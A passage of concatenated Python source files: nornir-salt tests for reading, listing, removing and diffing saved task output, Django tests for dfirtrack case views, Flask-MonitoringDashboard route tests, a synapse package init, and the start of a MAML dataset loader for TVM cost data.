'ip': '2.2.2.2'}]}}}
assert res_last_2 == {'IOL1': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi123',
'ip': '1.2.3.4'},
{'interface': 'Gi2',
'ip': '2.2.2.2'},
{'interface': 'Gi3',
'ip': '3.3.3.3'}]}},
'IOL2': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi2',
'ip': '4.4.4.4'}]}}}
# test_file_read_task_struct_data_last2()
@skip_if_no_nornir
def test_file_read_task_struct_data_result_with_subtasks():
clean_up_folder()
iol1_res_ntp = [
{"ntp": "1.1.1.1"},
]
iol2_res_ntp = [
{"ntp": "2.2.2.2"},
]
iol1_res_log = [
{"log": "3.3.3.3"},
]
iol2_res_log = [
{"log": "4.4.4.4"},
]
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
# first task run
nr_with_tf.run(
task=nr_test_grouped_subtasks,
task_1={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_ntp,
"IOL2": iol2_res_ntp,
},
"name": "show run | inc ntp",
},
task_2={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_log,
"IOL2": iol2_res_log,
},
"name": "show run | inc logging",
},
)
# retrieve file content
res = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
_ = res["IOL1"]['show run | inc ntp'].pop("timestamp")
_ = res["IOL2"]['show run | inc ntp'].pop("timestamp")
_ = res["IOL1"]['show run | inc logging'].pop("timestamp")
_ = res["IOL2"]['show run | inc logging'].pop("timestamp")
assert res == {'IOL1': {'show run | inc logging': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'log': '3.3.3.3'}]},
'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'ntp': '1.1.1.1'}]}},
'IOL2': {'show run | inc logging': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'log': '4.4.4.4'}]},
'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'ntp': '2.2.2.2'}]}}}
# test_file_read_task_struct_data_result_with_subtasks()
@skip_if_no_nornir
def test_file_read_result_struct_data_with_subtasks_task_name():
""" Should return task results for one task only """
clean_up_folder()
iol1_res_ntp = [
{"ntp": "1.1.1.1"},
]
iol2_res_ntp = [
{"ntp": "2.2.2.2"},
]
iol1_res_log = [
{"log": "3.3.3.3"},
]
iol2_res_log = [
{"log": "4.4.4.4"},
]
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
# first task run
nr_with_tf.run(
task=nr_test_grouped_subtasks,
task_1={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_ntp,
"IOL2": iol2_res_ntp,
},
"name": "show run | inc ntp",
},
task_2={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_log,
"IOL2": iol2_res_log,
},
"name": "show run | inc logging",
},
)
# retrieve file content
res = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
task_name="show run | inc logging"
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
_ = res["IOL1"]['show run | inc logging'].pop("timestamp")
_ = res["IOL2"]['show run | inc logging'].pop("timestamp")
assert res == {'IOL1': {'show run | inc logging': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'log': '3.3.3.3'}]}},
'IOL2': {'show run | inc logging': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'log': '4.4.4.4'}]}}}
# test_file_read_result_struct_data_with_subtasks_task_name()
@skip_if_no_nornir
def test_file_read_struct_data_with_DataProcessor_lod_filter():
""" test tofile write and after that read passing via lod filter """
clean_up_folder()
iol1_res = [
{"ip": "1.2.3.4", "interface": "Gi123"},
{"ip": "1.2.2.2", "interface": "Gi2"},
{"ip": "1.3.3.3", "interface": "Gi3"},
]
iol2_res = [
{"ip": "1.2.4.4", "interface": "Gi2"},
]
# run task to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
output = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res,
"IOL2": iol2_res,
},
name="show run | inc ntp",
)
# retrieve file content passing it through data processor
nr_with_dp = nr.with_processors([DataProcessor(
[{"fun": "lod_filter", "ip": "1.2.*", "interface": "Gi[23]"}]
)])
res = nr_with_dp.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
_ = res["IOL1"]['show run | inc ntp'].pop("timestamp")
_ = res["IOL2"]['show run | inc ntp'].pop("timestamp")
assert res == {'IOL1': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi2',
'ip': '1.2.2.2'}]}},
'IOL2': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi2',
'ip': '1.2.4.4'}]}}}
# test_file_read_struct_data_with_DataProcessor_lod_filter()
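The filter patterns above (`"1.2.*"`, `"Gi[23]"`) look like shell-style globs, which stdlib `fnmatch` can evaluate. The sketch below is a hedged approximation of a list-of-dicts filter, not DataProcessor's actual `lod_filter` code:

```python
# Hedged sketch (not DataProcessor's actual code): filter a list of
# dicts keeping items where every key matches its shell-style pattern.
from fnmatch import fnmatch


def lod_filter_sketch(data, **patterns):
    return [
        item
        for item in data
        if all(
            fnmatch(str(item.get(key, "")), pattern)
            for key, pattern in patterns.items()
        )
    ]
```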
@skip_if_no_nornir
def test_file_list_get_all_files():
""" produces list of files """
clean_up_folder()
generate_files(tf="interfaces")
generate_files(tf="interfaces")
generate_files(tf="ip")
generate_files(tf="interfaces")
# retrieve file content
res = nr.run(
task=file_list,
base_url="./tofile_outputs/",
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
assert isinstance(res["IOL1"]["file_list"]["result"], list)
assert len(res["IOL1"]["file_list"]["result"]) == 4
assert res["IOL1"]["file_list"]["exception"] == None
assert isinstance(res["IOL2"]["file_list"]["result"], list)
assert len(res["IOL2"]["file_list"]["result"]) == 4
assert res["IOL2"]["file_list"]["exception"] == None
# test_file_list_get_all_files()
@skip_if_no_nornir
def test_file_list_get_one_filegroup():
""" produces list of files """
clean_up_folder()
generate_files(tf="interfaces")
generate_files(tf="interfaces")
generate_files(tf="ip")
generate_files(tf="interfaces")
# retrieve files list
res = nr.run(
task=file_list,
base_url="./tofile_outputs/",
filegroup="ip"
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
assert isinstance(res["IOL1"]["file_list"]["result"], list)
assert len(res["IOL1"]["file_list"]["result"]) == 1
assert res["IOL1"]["file_list"]["result"][0]["filegroup"] == "ip"
assert res["IOL1"]["file_list"]["exception"] == None
assert isinstance(res["IOL2"]["file_list"]["result"], list)
assert len(res["IOL2"]["file_list"]["result"]) == 1
assert res["IOL2"]["file_list"]["result"][0]["filegroup"] == "ip"
assert res["IOL2"]["file_list"]["exception"] == None
# test_file_list_get_one_filegroup()
@skip_if_no_nornir
def test_file_remove_all():
clean_up_folder()
generate_files(tf="interfaces")
generate_files(tf="interfaces")
generate_files(tf="ip")
generate_files(tf="interfaces")
# check if folder is not empty
if os.path.exists("./tofile_outputs/"):
assert len(list(os.listdir("./tofile_outputs/"))) == 9, "not all files saved"
# run task to delete all data files
# retrieve files list
res = nr.run(
task=file_remove,
base_url="./tofile_outputs/",
filegroup=True,
)
res = ResultSerializer(res, add_details=True)
# check if folder is cleaned
if os.path.exists("./tofile_outputs/"):
assert len(list(os.listdir("./tofile_outputs/"))) == 1, "not all files removed"
# pprint.pprint(res)
assert len(res["IOL1"]["file_remove"]["result"]) == 4
assert len(res["IOL2"]["file_remove"]["result"]) == 4
# retrieve files list
files_list = nr.run(
task=file_list,
base_url="./tofile_outputs/",
filegroup="ip"
)
files_list = ResultSerializer(files_list, add_details=True)
# pprint.pprint(files_list)
assert len(files_list["IOL1"]["file_list"]["result"]) == 0
assert len(files_list["IOL2"]["file_list"]["result"]) == 0
# try to generate more files to check if it will not fail
generate_files(tf="interfaces")
# test_file_remove_all()
@skip_if_no_nornir
def test_file_remove_filegroup():
clean_up_folder()
generate_files(tf="interfaces")
generate_files(tf="interfaces")
generate_files(tf="ip")
generate_files(tf="interfaces")
# check if folder is not empty
if os.path.exists("./tofile_outputs/"):
assert len(list(os.listdir("./tofile_outputs/"))) == 9, "not all files saved"
# run task to delete all data files
# retrieve files list
res = nr.run(
task=file_remove,
base_url="./tofile_outputs/",
filegroup="interfaces"
)
res = ResultSerializer(res, add_details=True)
# check if folder is cleaned
if os.path.exists("./tofile_outputs/"):
assert len(list(os.listdir("./tofile_outputs/"))) == 3, "Too many files removed"
# pprint.pprint(res)
assert len(res["IOL1"]["file_remove"]["result"]) == 3
assert len(res["IOL2"]["file_remove"]["result"]) == 3
# check index file was updated accordingly
index_file = "./tofile_outputs/tf_index_common.json"
with open(index_file, "r") as f:
index_data = json.loads(f.read())
assert index_data["interfaces"] == {}, "interfaces files data not removed from index"
assert len(index_data["ip"]) == 2, "ip files data removed from index"
# test_file_remove_filegroup()
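The index assertions above can be pictured with a small standalone sketch of how a `tf_index_common.json`-style index might be pruned after a filegroup is removed. This is an illustration, not ToFileProcessor's actual implementation:

```python
# Hedged sketch (not ToFileProcessor's actual code): removing a
# filegroup empties its index entry while other filegroups stay intact.
import json

index = {
    "interfaces": {"IOL1": ["f1.txt"], "IOL2": ["f2.txt"]},
    "ip": {"IOL1": ["f3.txt"], "IOL2": ["f4.txt"]},
}
index["interfaces"] = {}  # filegroup "interfaces" deleted from disk
restored = json.loads(json.dumps(index))  # round-trip as the index file would
```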
@skip_if_no_nornir
def test_file_diff_whole_result_last_1_2():
clean_up_folder()
# generate text files
iol1_res_old = """
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol1_res_new = """
ntp server 7.7.6.8
ntp server 7.7.7.7
ntp server 1.1.1.1
"""
iol2_res_old = """
ntp server 7.7.7.7
"""
iol2_res_new = """
ntp server 7.7.7.9
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="ntp_config", base_url="./tofile_outputs/")]
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_old,
"IOL2": iol2_res_old,
},
name="show run | inc ntp",
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_new,
"IOL2": iol2_res_new,
},
name="show run | inc ntp",
)
# run task to diff
output = nr.run(
task=file_diff,
base_url="./tofile_outputs/",
filegroup="ntp_config",
)
res = ResultSerializer(output, add_details=True)
# pprint.pprint(res, width=150)
# print(res["IOL1"]["ntp_config"]["result"])
# print(res["IOL2"]["ntp_config"]["result"])
assert """-ntp server 7.7.7.8
+ntp server 7.7.6.8
ntp server 7.7.7.7
+ntp server 1.1.1.1""" in res["IOL1"]["ntp_config"]["result"]
assert res["IOL1"]["ntp_config"]["result"].count("ntp_config") == 2
assert """-ntp server 7.7.7.7
+ntp server 7.7.7.9""" in res["IOL2"]["ntp_config"]["result"]
assert res["IOL2"]["ntp_config"]["result"].count("ntp_config") == 2
# test_file_diff_whole_result_last_1_2()
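The `-old/+new` lines asserted above follow unified-diff conventions, which stdlib `difflib` produces for the same inputs (file_diff's exact headers are nornir-salt's own, so this is only an illustration):

```python
# Illustration: stdlib difflib emits the same "-removed/+added" body
# lines the assertions above check for in file_diff's output.
import difflib

old = ["ntp server 7.7.7.8", "ntp server 7.7.7.7"]
new = ["ntp server 7.7.6.8", "ntp server 7.7.7.7", "ntp server 1.1.1.1"]
diff_lines = list(difflib.unified_diff(old, new, lineterm=""))
```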
@skip_if_no_nornir
def test_file_diff_whole_result_last_2_1():
clean_up_folder()
# generate text files
iol1_res_old = """
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol1_res_new = """
ntp server 7.7.6.8
ntp server 7.7.7.7
ntp server 1.1.1.1
"""
iol2_res_old = """
ntp server 7.7.7.7
"""
iol2_res_new = """
ntp server 7.7.7.9
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="ntp_config", base_url="./tofile_outputs/")]
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_old,
"IOL2": iol2_res_old,
},
name="show run | inc ntp",
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_new,
"IOL2": iol2_res_new,
},
name="show run | inc ntp",
)
# run task to diff
output = nr.run(
task=file_diff,
base_url="./tofile_outputs/",
filegroup="ntp_config",
last=[2,1]
)
res = ResultSerializer(output, add_details=True)
# pprint.pprint(res, width=150)
# print(res["IOL1"]["ntp_config"]["result"])
# print(res["IOL2"]["ntp_config"]["result"])
assert """-ntp server 7.7.6.8
+ntp server 7.7.7.8
ntp server 7.7.7.7
-ntp server 1.1.1.1""" in res["IOL1"]["ntp_config"]["result"]
assert res["IOL1"]["ntp_config"]["result"].count("ntp_config") == 2
assert """-ntp server 7.7.7.9
+ntp server 7.7.7.7""" in res["IOL2"]["ntp_config"]["result"]
assert res["IOL2"]["ntp_config"]["result"].count("ntp_config") == 2
# test_file_diff_whole_result_last_2_1()
@skip_if_no_nornir
def test_file_diff_whole_result_last_out_of_range():
clean_up_folder()
# generate text files
iol1_res_old = """
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol1_res_new = """
ntp server 7.7.6.8
ntp server 7.7.7.7
ntp server 1.1.1.1
"""
iol2_res_old = """
ntp server 7.7.7.7
"""
iol2_res_new = """
ntp server 7.7.7.9
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="ntp_config", base_url="./tofile_outputs/")]
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_old,
"IOL2": iol2_res_old,
},
name="show run | inc ntp",
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_new,
"IOL2": iol2_res_new,
},
name="show run | inc ntp",
)
# run task to diff
output = nr.run(
task=file_diff,
base_url="./tofile_outputs/",
filegroup="ntp_config",
last=151
)
res = ResultSerializer(output, add_details=True)
# pprint.pprint(res, width=150)
print(res["IOL1"]["ntp_config"]["result"])
print(res["IOL2"]["ntp_config"]["result"])
assert """-ntp server 7.7.7.8
+ntp server 7.7.6.8
ntp server 7.7.7.7
+ntp server 1.1.1.1""" in res["IOL1"]["ntp_config"]["result"]
assert res["IOL1"]["ntp_config"]["result"].count("ntp_config") == 2
assert """-ntp server 7.7.7.7
+ntp server 7.7.7.9""" in res["IOL2"]["ntp_config"]["result"]
assert res["IOL2"]["ntp_config"]["result"].count("ntp_config") == 2
# test_file_diff_whole_result_last_out_of_range()
@skip_if_no_nornir
def test_file_diff_whole_result_last_both_out_of_range():
clean_up_folder()
# generate text files
iol1_res_old = """
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol1_res_new = """
ntp server 7.7.6.8
ntp server 7.7.7.7
ntp server 1.1.1.1
"""
iol2_res_old = """
ntp server 7.7.7.7
"""
iol2_res_new = """
ntp server 7.7.7.9
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="ntp_config", base_url="./tofile_outputs/")]
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_old,
"IOL2": iol2_res_old,
},
name="show run | inc ntp",
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_new,
"IOL2": iol2_res_new,
},
name="show run | inc ntp",
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_new,
"IOL2": iol2_res_new,
},
name="show run | inc ntp",
)
# run task to diff
output = nr.run(
task=file_diff,
base_url="./tofile_outputs/",
filegroup="ntp_config",
last=[100,151]
)
res = ResultSerializer(output, add_details=True)
# pprint.pprint(res, width=150)
assert res["IOL1"]["ntp_config"]["failed"] == True
assert "new and old files are same" in res["IOL1"]["ntp_config"]["exception"]
assert res["IOL2"]["ntp_config"]["failed"] == True
assert "new and old files are same" in res["IOL2"]["ntp_config"]["exception"]
# test_file_diff_whole_result_last_both_out_of_range()
@skip_if_no_nornir
def test_file_diff_whole_result_last_2_1_string():
clean_up_folder()
# generate text files
iol1_res_old = """
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol1_res_new = """
ntp server 7.7.6.8
ntp server 7.7.7.7
ntp server 1.1.1.1
"""
iol2_res_old = """
ntp server 7.7.7.7
"""
iol2_res_new = """
ntp server 7.7.7.9
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="ntp_config", base_url="./tofile_outputs/")]
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_old,
"IOL2": iol2_res_old,
},
name="show run | inc ntp",
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_new,
"IOL2": iol2_res_new,
},
name="show run | inc ntp",
)
# run task to diff
output = nr.run(
task=file_diff,
base_url="./tofile_outputs/",
filegroup="ntp_config",
last="2, 1"
)
res = ResultSerializer(output, add_details=True)
# pprint.pprint(res, width=150)
# print(res["IOL1"]["ntp_config"]["result"])
# print(res["IOL2"]["ntp_config"]["result"])
assert """-ntp server 7.7.6.8
+ntp server 7.7.7.8
ntp server 7.7.7.7
-ntp server 1.1.1.1""" in res["IOL1"]["ntp_config"]["result"]
assert res["IOL1"]["ntp_config"]["result"].count("ntp_config") == 2
assert """-ntp server 7.7.7.9
+ntp server 7.7.7.7""" in res["IOL2"]["ntp_config"]["result"]
assert res["IOL2"]["ntp_config"]["result"].count("ntp_config") == 2
# test_file_diff_whole_result_last_2_1_string()
# dfirtrack_main/tests/case/test_case_views.py (blackhatethicalhacking/dfirtrack)
] | 1 | 2020-03-06T20:54:52.000Z | 2020-03-06T20:54:52.000Z | from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_main.models import Case
import urllib.parse
class CaseViewTestCase(TestCase):
""" case view tests """
@classmethod
def setUpTestData(cls):
# create user
test_user = User.objects.create_user(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# create object
Case.objects.create(
case_name='case_1',
case_is_incident=True,
case_created_by_user_id=test_user,
)
def test_cases_list_not_logged_in(self):
""" test list view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/cases/', safe='')
# get response
response = self.client.get('/cases/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
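A note on `safe=''` in the expected URL: by default `urllib.parse.quote` leaves `/` unescaped, but the `?next=` value the test compares against percent-encodes slashes too, so `safe=''` is required. A standalone check:

```python
# Standalone check: safe='' forces "/" to be percent-encoded, which is
# what the expected "?next=" redirect value needs; the default keeps "/".
import urllib.parse

encoded = urllib.parse.quote('/cases/', safe='')
default_encoded = urllib.parse.quote('/cases/')
```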
    def test_cases_list_logged_in(self):
        """ test list view """
        # login testuser
        login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
        # get response
        response = self.client.get('/cases/')
        # compare
        self.assertEqual(response.status_code, 200)

    def test_cases_list_template(self):
        """ test list view """
        # login testuser
        login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
        # get response
        response = self.client.get('/cases/')
        # compare
        self.assertTemplateUsed(response, 'dfirtrack_main/case/cases_list.html')

    def test_cases_list_get_user_context(self):
        """ test list view """
        # login testuser
        login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
        # get response
        response = self.client.get('/cases/')
        # compare
        self.assertEqual(str(response.context['user']), 'testuser_case')

    def test_cases_detail_not_logged_in(self):
        """ test detail view """
        # get object
        case_1 = Case.objects.get(case_name='case_1')
        # create url
        destination = '/login/?next=' + urllib.parse.quote('/cases/' + str(case_1.case_id), safe='')
        # get response
        response = self.client.get('/cases/' + str(case_1.case_id), follow=True)
        # compare
        self.assertRedirects(response, destination, status_code=302, target_status_code=200)

    def test_cases_detail_logged_in(self):
        """ test detail view """
        # get object
        case_1 = Case.objects.get(case_name='case_1')
        # login testuser
        login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
        # get response
        response = self.client.get('/cases/' + str(case_1.case_id))
        # compare
        self.assertEqual(response.status_code, 200)

    def test_cases_detail_template(self):
        """ test detail view """
        # get object
        case_1 = Case.objects.get(case_name='case_1')
        # login testuser
        login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
        # get response
        response = self.client.get('/cases/' + str(case_1.case_id))
        # compare
        self.assertTemplateUsed(response, 'dfirtrack_main/case/cases_detail.html')

    def test_cases_detail_get_user_context(self):
        """ test detail view """
        # get object
        case_1 = Case.objects.get(case_name='case_1')
        # login testuser
        login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
        # get response
        response = self.client.get('/cases/' + str(case_1.case_id))
        # compare
        self.assertEqual(str(response.context['user']), 'testuser_case')

    def test_cases_add_not_logged_in(self):
        """ test add view """
        # create url
        destination = '/login/?next=' + urllib.parse.quote('/cases/add/', safe='')
        # get response
        response = self.client.get('/cases/add/', follow=True)
        # compare
        self.assertRedirects(response, destination, status_code=302, target_status_code=200)

    def test_cases_add_logged_in(self):
        """ test add view """
        # login testuser
        login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
        # get response
        response = self.client.get('/cases/add/')
        # compare
        self.assertEqual(response.status_code, 200)

    def test_cases_add_template(self):
        """ test add view """
        # login testuser
        login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
        # get response
        response = self.client.get('/cases/add/')
        # compare
        self.assertTemplateUsed(response, 'dfirtrack_main/case/cases_add.html')

    def test_cases_add_get_user_context(self):
        """ test add view """
        # login testuser
        login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
        # get response
        response = self.client.get('/cases/add/')
        # compare
        self.assertEqual(str(response.context['user']), 'testuser_case')

    def test_cases_edit_not_logged_in(self):
        """ test edit view """
        # get object
        case_1 = Case.objects.get(case_name='case_1')
        # create url
        destination = '/login/?next=' + urllib.parse.quote('/cases/' + str(case_1.case_id) + '/edit/', safe='')
        # get response
        response = self.client.get('/cases/' + str(case_1.case_id) + '/edit/', follow=True)
        # compare
        self.assertRedirects(response, destination, status_code=302, target_status_code=200)

    def test_cases_edit_logged_in(self):
        """ test edit view """
        # get object
        case_1 = Case.objects.get(case_name='case_1')
        # login testuser
        login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
        # get response
        response = self.client.get('/cases/' + str(case_1.case_id) + '/edit/')
        # compare
        self.assertEqual(response.status_code, 200)

    def test_cases_edit_template(self):
        """ test edit view """
        # get object
        case_1 = Case.objects.get(case_name='case_1')
        # login testuser
        login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
        # get response
        response = self.client.get('/cases/' + str(case_1.case_id) + '/edit/')
        # compare
        self.assertTemplateUsed(response, 'dfirtrack_main/case/cases_edit.html')

    def test_cases_edit_get_user_context(self):
""" test edit view """
# get object
case_1 = Case.objects.get(case_name='case_1')
# login testuser
login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# get response
response = self.client.get('/cases/' + str(case_1.case_id) + '/edit/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_case')
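The redirect tests above build the expected login destination with `urllib.parse.quote`. A minimal standalone sketch (the case id `1` is an illustrative value, not taken from the test fixtures):

```python
import urllib.parse

# safe='' forces the slashes to be percent-encoded too, so the whole
# target path survives as a single "next" query-string value.
case_id = 1  # illustrative value
destination = '/login/?next=' + urllib.parse.quote('/cases/' + str(case_id), safe='')
```

With `safe=''` every reserved character, including `/`, becomes a `%XX` escape, which is what `assertRedirects` compares against.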
# ---- flask_monitoringdashboard/test/routings/test_result.py (Qqwy/Flask-MonitoringDashboard, MIT) ----
import unittest
from flask_monitoringdashboard.test.utils import set_test_environment, clear_db, add_fake_data, get_test_app, login, \
    NAME


class TestResult(unittest.TestCase):

    def setUp(self):
        set_test_environment()
        clear_db()
        add_fake_data()
        self.app = get_test_app()

    def test_result_heatmap(self):
        """
        Just retrieve the content and check if nothing breaks
        """
        self.assertEqual(302, self.app.get('dashboard/result/{}/heatmap'.format(NAME)).status_code)
        login(self.app)
        self.assertEqual(200, self.app.get('dashboard/result/{}/heatmap'.format(NAME)).status_code)

    def test_result_time_per_hour(self):
        """
        Just retrieve the content and check if nothing breaks
        """
        self.assertEqual(302, self.app.get('dashboard/result/{}/time_per_hour'.format(NAME)).status_code)
        login(self.app)
        self.assertEqual(200, self.app.get('dashboard/result/{}/time_per_hour'.format(NAME)).status_code)

    def test_result_hits_per_hour(self):
        """
        Just retrieve the content and check if nothing breaks
        """
        self.assertEqual(302, self.app.get('dashboard/result/{}/hits_per_hour'.format(NAME)).status_code)
        login(self.app)
        self.assertEqual(200, self.app.get('dashboard/result/{}/hits_per_hour'.format(NAME)).status_code)

    def test_result_time_per_version_per_user(self):
        """
        Just retrieve the content and check if nothing breaks
        """
        self.assertEqual(302, self.app.get('dashboard/result/{}/time_per_version_per_user'.format(NAME)).status_code)
        login(self.app)
        self.assertEqual(200, self.app.get('dashboard/result/{}/time_per_version_per_user'.format(NAME)).status_code)

    def test_result_time_per_version_per_ip(self):
        """
        Just retrieve the content and check if nothing breaks
        """
        self.assertEqual(302, self.app.get('dashboard/result/{}/time_per_version_per_ip'.format(NAME)).status_code)
        login(self.app)
        self.assertEqual(200, self.app.get('dashboard/result/{}/time_per_version_per_ip'.format(NAME)).status_code)

    def test_result_time_per_version(self):
        """
        Just retrieve the content and check if nothing breaks
        """
        self.assertEqual(302, self.app.get('dashboard/result/{}/time_per_version'.format(NAME)).status_code)
        login(self.app)
        self.assertEqual(200, self.app.get('dashboard/result/{}/time_per_version'.format(NAME)).status_code)

    def test_result_time_per_user(self):
        """
        Just retrieve the content and check if nothing breaks
        """
        self.assertEqual(302, self.app.get('dashboard/result/{}/time_per_user'.format(NAME)).status_code)
        login(self.app)
        self.assertEqual(200, self.app.get('dashboard/result/{}/time_per_user'.format(NAME)).status_code)

    def test_result_outliers(self):
        """
        Just retrieve the content and check if nothing breaks
        """
        self.assertEqual(302, self.app.get('dashboard/result/{}/outliers'.format(NAME)).status_code)
        login(self.app)
        self.assertEqual(200, self.app.get('dashboard/result/{}/outliers'.format(NAME)).status_code)
# ---- synapse/__init__.py (brymer-meneses/sparknet, Apache-2.0) ----
from synapse.core.tensor import Tensor
from synapse.core.ops import matmul, pow
from synapse.core.differentiable import Differentiable
from synapse.utils.grad_modes import grad_state, no_grad
# ---- maml/custom.py (ryujaehun/maml, MIT) ----
import glob, os
import warnings
import numpy as np
import torch
from torch.utils.data import Dataset
warnings.filterwarnings("ignore")
import random
import torch.nn.functional as F


class GraphDataset(Dataset):
    # Task granularity: the cost data is simply split into consecutive chunks
    # of 100 points; each chunk is treated as one "task" (true task boundaries
    # are not considered).

    def __init__(self, ways=5, shot=5, test_shot=5, size=10000000, transform=None, val=False,
                 template=True, save_path=None, sample=False, feature_size=128):
        self.shot = shot
        self.ways = ways
        self.test_shot = test_shot
        self.__save_path = '/root/incubator-tvm/result/2020_10_30'
        self.transform = transform
        self.__tasks = ('conv1d', 'conv1d_transpose', 'conv2d', 'conv2d_winograd', 'conv2d_transpose')
        if val:
            self.__tasks = ['conv2d', 'conv2d_winograd']
        if template:
            if sample:
                self.__cost_path = list(map(lambda x: os.path.join(self.__save_path, x, 'template', str(feature_size), 'sample', 'label.npy'), self.__tasks))
                self.__feature_path = list(map(lambda x: os.path.join(self.__save_path, x, 'template', str(feature_size), 'sample', 'batch_1.npy'), self.__tasks))
            else:
                self.__cost_path = list(map(lambda x: os.path.join(self.__save_path, x, 'template', str(feature_size), 'full', 'label.npy'), self.__tasks))
                self.__feature_path = list(map(lambda x: os.path.join(self.__save_path, x, 'template', str(feature_size), 'full', 'batch_1.npy'), self.__tasks))
        else:
            if sample:
                self.__cost_path = list(map(lambda x: os.path.join(self.__save_path, x, 'non-template', str(feature_size), 'sample', 'label.npy'), self.__tasks))
                self.__feature_path = list(map(lambda x: os.path.join(self.__save_path, x, 'non-template', str(feature_size), 'sample', 'batch_1.npy'), self.__tasks))
            else:
                self.__cost_path = list(map(lambda x: os.path.join(self.__save_path, x, 'non-template', str(feature_size), 'full', 'label.npy'), self.__tasks))
                self.__feature_path = list(map(lambda x: os.path.join(self.__save_path, x, 'non-template', str(feature_size), 'full', 'batch_1.npy'), self.__tasks))
        _feature = []
        for fea in self.__feature_path:
            _feature.append(np.load(fea))
        _cost = []
        for cost in self.__cost_path:
            _cost.append(np.load(cost))
        self.__features = np.vstack(_feature).squeeze()
        self.__costs = np.vstack(_cost).squeeze()
        self.__n_task = int(np.ceil(len(self.__costs) / 100))
        self.__cost_len = len(self.__costs)

    def __len__(self):
        return self.__cost_len * self.shot * self.ways

    def candidate(self, ways, shot):
        # Sample `shot` indices from each selected 100-point chunk; the last
        # chunk may hold fewer than 100 points.
        _list = []
        for way in ways:
            if way == self.__n_task - 1:
